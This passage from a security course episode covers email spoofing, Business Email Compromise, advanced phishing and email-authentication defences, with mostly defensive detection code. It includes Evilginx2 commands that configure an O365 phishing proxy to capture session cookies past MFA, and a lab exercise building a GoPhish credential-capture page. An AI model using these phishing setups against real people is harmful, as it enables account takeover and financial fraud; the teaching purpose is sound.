        print("  No obvious red flags detected (does NOT mean safe)")


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit(f"Usage: {sys.argv[0]} <message.eml>")
    analyze_headers(sys.argv[1])
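The script above looks for substrings like 'spf=fail' in the Authentication-Results header. If you want the verdicts as structured data (for example to feed into a SIEM), a small regex does the job. This is a sketch under my own naming; it keeps only the first verdict per method and ignores the property fields such as header.from.

```python
import re

_VERDICT = re.compile(r"\b(spf|dkim|dmarc)\s*=\s*([a-z]+)", re.IGNORECASE)


def parse_auth_results(value: str) -> dict:
    """Extract method -> result (spf, dkim, dmarc) from an
    Authentication-Results header value."""
    results = {}
    for method, result in _VERDICT.findall(value):
        # Keep the first verdict per method; a message with several
        # DKIM signatures can carry more than one dkim= entry
        results.setdefault(method.lower(), result.lower())
    return results
```

One caveat worth remembering: only trust an Authentication-Results header that was added by your own receiving server. A sender can put a forged one in the message before it ever reaches you, so check that the server identifier at the start of the header is one of yours.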
The Reply-To header is a subtle but important attack vector. An attacker sends an email with a spoofed From: address (the CEO's) but a Reply-To: address the attacker controls. If the employee hits "Reply" instead of composing a new message, their response goes to the attacker's address, not the CEO's. This enables back-and-forth conversation with the victim -- the attacker can answer questions, provide fake context, and build trust over multiple exchanges. It's far more convincing than a single phishing email because it mimics a real conversation.
Business Email Compromise -- The Billion-Dollar Attack
BEC (Business Email Compromise) is one of the most financially destructive cybercrime categories on record. The FBI's Internet Crime Complaint Center reported over $50 billion in exposed losses worldwide from BEC between 2013 and 2022. Not ransomware. Not data breaches. Email fraud -- someone sends a convincing email and money gets wired to the wrong account.
The attack requires zero technical sophistication. No malware. No exploits. No vulnerability in any software. Just a convincing email that appears to come from someone with authority:
Typical BEC scenarios:
1. CEO Fraud
Attacker impersonates the CEO, emails the CFO or finance team
"Wire $200,000 to this account for the acquisition we discussed"
Finance wires the money. Money is gone.
2. Vendor Impersonation
Attacker compromises a vendor's email (or spoofs it)
"Our banking details have changed. Please update your records."
Sends a legitimate-looking invoice with new (attacker) bank details
Company pays the next invoice to the attacker
3. Payroll Diversion
Attacker impersonates an employee, emails HR
"Please update my direct deposit to this new account"
HR updates the payroll record
Next paycheck goes to the attacker
4. Attorney Impersonation
Attacker poses as the company's law firm during M&A activity
"Wire the escrow funds to this account immediately"
Sense of urgency + legal authority = compliance without verification
The defenses against BEC are procedural, not technical. No email filter can reliably distinguish a legitimate CEO request from a spoofed one, especially if the attacker has done their homework (researching the company's M&A activity on LinkedIn, knowing the CFO's name, mimicking the CEO's writing style from public posts):
BEC defense checklist:
1. Out-of-band verification for ALL financial requests
- Wire transfer request via email? CALL the requester on their
known phone number (not the one in the email)
- Use a DIFFERENT communication channel to verify: Teams, Signal, phone
- The email says "I'm in a meeting, can't take calls"?
That IS the red flag
2. Dual authorization for transfers above threshold
- No single person can authorize a wire transfer over $10K
- Two approvers from different teams/levels
3. Vendor payment change verification
- Any request to change vendor banking details requires
calling the vendor's known contact number
- Not the number in the email. The number in your CRM.
4. Email banners for external mail
- [EXTERNAL] tag on all emails from outside the organization
- If the CEO's email has [EXTERNAL], something is wrong
5. Domain monitoring
- Monitor certificate transparency logs for look-alike domains
- Register common typosquats of your own domain proactively
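The domain monitoring item in the checklist can be sketched as a simple edit-distance filter. This assumes you already have a list of newly observed domains from some feed (for example, exported from a certificate transparency monitor); the function names, the threshold of 2, and the sample domains are all hypothetical choices for illustration.

```python
def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance using a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]


def lookalikes(own_domain: str, observed: list[str], max_distance: int = 2) -> list[str]:
    """Return observed domains that are close to, but not equal to, our own."""
    own = own_domain.lower()
    hits = []
    for domain in observed:
        domain = domain.lower()
        if domain != own and edit_distance(own, domain) <= max_distance:
            hits.append(domain)
    return hits


# Hypothetical feed of recently seen domains
seen = ["examp1e-corp.com", "example-corp.com", "unrelated.org", "exampel-corp.com"]
print(lookalikes("example-corp.com", seen))
```

Edit distance catches character swaps and single-character substitutions, but it will miss look-alikes built from a different TLD or an added word, so treat it as one signal among several.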
I cannot stress this enough: BEC is not a "technical" attack. It's a social engineering attack that happens to use email as the delivery mechanism. We covered social engineering in episode 8, and BEC is the most expensive manifestation of those principles. The attacker exploits authority ("the CEO said to do it"), urgency ("this must be done today"), and trust ("this email looks exactly like our CEO's normal style"). The technical controls help -- SPF/DKIM/DMARC prevent domain spoofing -- but they don't stop an attacker who compromises the actual CEO's mailbox, or who uses a convincing look-alike domain, or who simply spoofs the display name with a different underlying address.
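Display-name spoofing is the one variant above that a simple lookup can catch: the name matches a known executive but the address underneath does not. A minimal sketch, assuming a hypothetical `KNOWN_SENDERS` directory that maps display names to the single address each person really uses (the names and addresses here are made up):

```python
from email.utils import parseaddr

# Hypothetical directory: lowercase display name -> the address that person really uses
KNOWN_SENDERS = {"jane doe": "jane.doe@corp.example"}


def display_name_spoofed(from_header: str, directory: dict[str, str] = KNOWN_SENDERS) -> bool:
    """Flag a From header whose display name is known but whose address is not."""
    name, addr = parseaddr(from_header)
    expected = directory.get(name.strip().lower())
    # Unknown names are not flagged; only a known name with the wrong address is
    return expected is not None and addr.lower() != expected


print(display_name_spoofed('"Jane Doe" <jane.doe@corp.example>'))
print(display_name_spoofed('"Jane Doe" <jdoe.ceo@freemail.example>'))
```

This does nothing against a compromised mailbox, which is exactly why the procedural checks still matter.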
Advanced Phishing Techniques
Beyond basic email spoofing, modern phishing campaigns use increasingly sophisticated techniques:
# 1. Evilginx2 -- man-in-the-middle phishing proxy
# Instead of cloning a login page, Evilginx2 acts as a reverse proxy
# between the victim and the real login page
# The victim authenticates against the REAL site through Evilginx2
# Evilginx2 captures the session token AFTER MFA is completed
# Result: attacker gets a fully authenticated session, MFA bypassed
# Start Evilginx2 (once installed), pointing it at the phishlets directory
evilginx2 -p /path/to/phishlets
# Configure a phishlet (e.g., O365)
phishlets hostname o365 login.target-company.com
phishlets enable o365
lures create o365
# The victim visits: https://login.target-company.com (your domain)
# They see the REAL Microsoft login page (proxied)
# They enter their password + MFA code
# Evilginx2 captures the authenticated session cookie
# Attacker can now use that cookie to access the victim's account
# without knowing their password or having their MFA device
# 2. QR Code phishing (Quishing)
# Email contains a QR code instead of a clickable link
# "Scan this QR code to verify your account"
# QR codes bypass email link scanners (they analyze URLs, not images)
# The URL embedded in the QR code leads to the phishing page
# Works especially well because mobile devices have weaker URL
# inspection than desktops
# 3. HTML smuggling
# Attach an HTML file that constructs and downloads a payload
# client-side using JavaScript. The attachment itself contains
# no malware -- just JavaScript that assembles the payload in
# the browser. Email gateways scanning the attachment find only
# HTML and JavaScript, not the actual malware.
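From the defender's side, the HTML smuggling pattern in item 3 tends to leave recognizable JavaScript fingerprints in the attachment. The sketch below is a rough heuristic, not a detection engine: the indicator list is my own assumption of commonly combined calls, it is not exhaustive, and legitimate pages use some of these too.

```python
import re

# Assumed indicator list for illustration; expect false positives and misses
INDICATORS = {
    "base64 decode": re.compile(r"\batob\s*\("),
    "Blob construction": re.compile(r"\bnew\s+Blob\s*\("),
    "object URL": re.compile(r"\bURL\.createObjectURL\s*\("),
    "forced download": re.compile(r"\.download\s*="),
    "legacy IE save": re.compile(r"\bmsSaveOrOpenBlob\s*\("),
}


def smuggling_indicators(html: str) -> list[str]:
    """Return the labels of all indicators found in an HTML attachment."""
    return [label for label, pattern in INDICATORS.items() if pattern.search(html)]


# Hypothetical attachment body that assembles a file in the browser
sample_attachment = """<script>
var data = atob("TVqQAAMAAAAEAAAA");
var blob = new Blob([data], {type: "application/octet-stream"});
var a = document.createElement("a");
a.href = URL.createObjectURL(blob);
a.download = "invoice.iso";
a.click();
</script>"""

print(smuggling_indicators(sample_attachment))
```

A single hit means little; several hits together in an email attachment are worth a closer look.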
The Evilginx2 reverse proxy technique deserves special attention because it defeats MFA. Traditional phishing captures a password. The user enables MFA and thinks they're safe. Evilginx2 doesn't stop at the password -- it sits in the middle of the real login flow and also captures the session cookie that's issued AFTER the user completes both password entry and MFA verification. The user interacts with the real login page (proxied through the attacker's server), completes the full authentication flow including MFA, and the attacker steals the resulting session. This is why phishing-resistant MFA methods (FIDO2, hardware keys) are gaining traction -- they bind the authentication to the specific domain, so a proxied login page on login.target-company.com (attacker domain) won't trigger the hardware key that's registered for login.microsoftonline.com ;-)
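The domain binding can be illustrated with a heavily simplified sketch of one check a WebAuthn relying party performs: the browser records the origin of the page it is actually on, and the server compares it to the origin it expects. The helper names are hypothetical, and the sketch deliberately leaves out signature verification, challenge validation, and the RP ID scoping done by the authenticator itself.

```python
import json

EXPECTED_ORIGIN = "https://login.microsoftonline.com"


def browser_client_data(page_origin: str, challenge: str) -> bytes:
    """Stand-in for the browser: it fills in the origin of the page it is on."""
    return json.dumps(
        {"type": "webauthn.get", "challenge": challenge, "origin": page_origin}
    ).encode()


def origin_matches(client_data_json: bytes, expected_origin: str = EXPECTED_ORIGIN) -> bool:
    """Simplified relying-party check on the origin recorded by the browser."""
    client_data = json.loads(client_data_json)
    return (client_data.get("type") == "webauthn.get"
            and client_data.get("origin") == expected_origin)


# Victim on the real site vs. victim on the proxied phishing domain
real = browser_client_data("https://login.microsoftonline.com", "abc123")
proxied = browser_client_data("https://login.target-company.com", "abc123")
print(origin_matches(real), origin_matches(proxied))
```

The user cannot be talked into overriding this, because the origin is written by the browser, not typed by a human.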
Defense: Securing Email
# Layer 1: Email Authentication (SPF + DKIM + DMARC)
# SPF -- hard fail, list ALL authorized senders
# DNS TXT record:
# v=spf1 include:_spf.google.com include:amazonses.com -all
#                                                      ^^^^
# MUST be -all (hard fail), NOT ~all (soft fail)
# DKIM -- enable signing on your mail server
# Google Workspace: Admin Console > Apps > Gmail > Authenticate email
# Microsoft 365: Defender portal > Email authentication > DKIM
# DMARC -- enforce reject policy
# DNS TXT record for _dmarc.yourdomain.com:
# v=DMARC1; p=reject; rua=mailto:<your-reporting-address>; pct=100
# Layer 2: Email Gateway / Secure Email Gateway (SEG)
# - Sandbox all attachments (detonate in isolated environment)
# - Rewrite URLs for time-of-click analysis (check URL reputation
# when the user clicks, not when the email was received)
# - Strip macros from Office documents
# - Flag or block emails with lookalike domains
# - Add [EXTERNAL] banner to all inbound email from outside the org
# Layer 3: Anti-phishing Technical Controls
# - Implement FIDO2/WebAuthn for phishing-resistant MFA
# - Deploy browser extensions that warn on lookalike domains
# - Configure Conditional Access (Microsoft Entra ID, formerly Azure AD) to restrict auth
# to managed devices and known locations
# - Enable real-time link scanning in email clients
# Layer 4: User Awareness (necessary but insufficient)
# - Regular phishing simulations (GoPhish, quarterly minimum)
# - Teach header inspection (check actual sender, not display name)
# - Establish and PRACTICE verification procedures for financial requests
# - Make it easy and consequence-free to report suspicious emails
# (a phishing report button that doesn't require effort)
# - Track metrics: click rates, report rates, time-to-report
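Layer 1 is easy to audit once you have the TXT records in hand (for example from dig). The sketch below grades SPF and DMARC record strings offline; the function names and verdict labels are my own, and it ignores details such as pct, sp, and SPF redirect, so read it as a starting point rather than a full parser.

```python
def parse_dmarc(record: str) -> dict[str, str]:
    """Split 'v=DMARC1; p=reject; ...' into a tag -> value dict."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, _, value = part.partition("=")
            tags[key.strip().lower()] = value.strip()
    return tags


def dmarc_verdict(record: str) -> str:
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return "invalid"
    policy = tags.get("p", "").lower()
    if policy == "reject":
        return "enforced"
    if policy == "quarantine":
        return "partial"
    return "monitoring only"  # p=none (a missing p tag is treated the same here)


def spf_verdict(record: str) -> str:
    terms = record.lower().split()
    if not terms or terms[0] != "v=spf1":
        return "invalid"
    if "-all" in terms:
        return "hard fail"
    if "~all" in terms:
        return "soft fail"
    return "no strict all"


# Hypothetical records for illustration
print(spf_verdict("v=spf1 include:_spf.google.com include:amazonses.com -all"))
print(dmarc_verdict("v=DMARC1; p=none; rua=mailto:reports@corp.example"))
```

Running this across all your sending domains makes it obvious which ones are still stuck in the monitoring phase.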
The AI Slop Connection
AI is transforming phishing on both sides of the equation, and the attackers are winning.
On the offensive side, AI-generated phishing emails are grammatically perfect, contextually aware, and personalized at scale. The era of "check for spelling errors" as a phishing detection heuristic is completely over. An AI can scrape a target's LinkedIn profile, their recent public posts, their company's press releases, and generate a phishing email that references specific projects, uses the right internal terminology, and mimics the writing style of a colleague. The old "Nigerian prince" emails were easy to spot because they were poorly written. Modern AI phishing is indistinguishable from legitimate email because it IS well-written.
On the defensive side, AI is actively making email security configuration worse. AI assistants suggest SPF records with ~all instead of -all because "soft fail is safer during rollout." They generate DMARC records with p=none because "start with monitoring before enforcing." They never tell the user to schedule the migration to enforcement. The monitoring phase becomes permanent, and p=none provides exactly zero protection against spoofing.
The combination is devastating: better phishing emails hitting inboxes that are less protected because the email security was configured by an AI that optimized for "don't break anything" instead of "don't get breached."
The Bigger Picture
With episodes 35 through 39, we've now covered the full modern attack surface from infrastructure to the human: cloud platforms (35-36), containers (37), Infrastructure as Code (38), and now the initial access vector that leads to all of those -- email. The pattern is consistent across every layer: the protocols and systems were not designed with security as a primary requirement, security was bolted on later, and the bolt-on solutions only work when they're properly configured. SPF with ~all is like an IAM policy with "Action": "*" -- technically present but functionally useless.
The next episodes will move into DNS attacks and exploitation frameworks. DNS is the other foundational protocol (alongside email) that was designed without security in mind, and understanding how to manipulate DNS resolution opens up attack vectors that affect every layer of the stack we've covered so far. And exploitation frameworks like Metasploit systematize the manual techniques we've been demonstrating -- instead of crafting each exploit by hand, you'll use tooling that automates the process at scale.
Exercises
Exercise 1: Check the email authentication of 5 domains you interact with (your employer, your bank, major services). For each, look up: SPF record (dig TXT domain.com), DMARC record (dig TXT _dmarc.domain.com), and DMARC policy level (none/quarantine/reject). Document which domains are vulnerable to spoofing (no DMARC or p=none). Do NOT attempt to spoof -- just assess the configuration. Save your findings to ~/lab-notes/email-auth-assessment.md.
Exercise 2: Set up GoPhish on your lab machine. Create a phishing campaign targeting yourself: (a) set up a sending profile using a local SMTP server (Postfix or hMailServer), (b) create a convincing email template mimicking a password reset notification from a service you use, (c) create a landing page that captures submitted data. Send the campaign to your own email and verify the credential capture works. Document the full setup process and the GoPhish dashboard results in ~/lab-notes/gophish-simulation.md.
Exercise 3: Obtain the raw headers of a legitimate email and a spam/phishing email from your inbox. For each, trace the delivery path by reading the Received headers bottom-up. Document: (a) the originating IP address, (b) how many mail servers it passed through, (c) the SPF/DKIM/DMARC authentication results from the Authentication-Results header, (d) any red flags (mismatched From/Return-Path domains, unusual routing, failed authentication). Save your analysis to ~/lab-notes/email-header-forensics.md.